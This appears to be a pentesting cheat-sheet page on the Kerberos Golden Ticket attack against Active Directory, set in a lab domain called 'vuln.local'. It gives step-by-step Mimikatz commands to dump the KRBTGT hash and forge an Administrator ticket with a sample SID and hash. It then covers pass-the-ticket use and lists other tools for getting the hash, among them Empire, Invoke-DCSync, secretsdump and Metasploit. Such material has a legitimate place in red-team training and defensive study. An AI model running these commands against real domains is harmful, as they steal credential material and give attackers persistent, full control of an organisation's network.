Golden Ticket
Requirements: Domain Administrator Account or account with DCSync rights
Essential information for the attack to work:
Example Steps
1) Run Mimikatz
privilege::debug2) Dump information from the KRBTGT account to construct the golden ticket (Domain SID and NTLM Hash)
lsadump::lsa /inject /name:krbtgt3) Put it all together to create the golden ticket
kerberos::golden /User:Administrator /domain:vuln.local /sid:S-1-5-21-2356823372-3609795904-2142328116 /krbtgt:ab20acb811769e025aba7d4fef487b96 /id:500 /ptt4) Create a separate command line session using the Golden Ticket (Pass-the-Ticket)
5) With the newly created shell, we can run the command "dir" on a workstation on the network
Alternate Method: Empire C2
Methods of KRBTGT hash retrieval
1) Mimikatz
2) Empire C2
3) Invoke-DCSync
4) Impacket Secretsdump
5) Metasploit
Last updated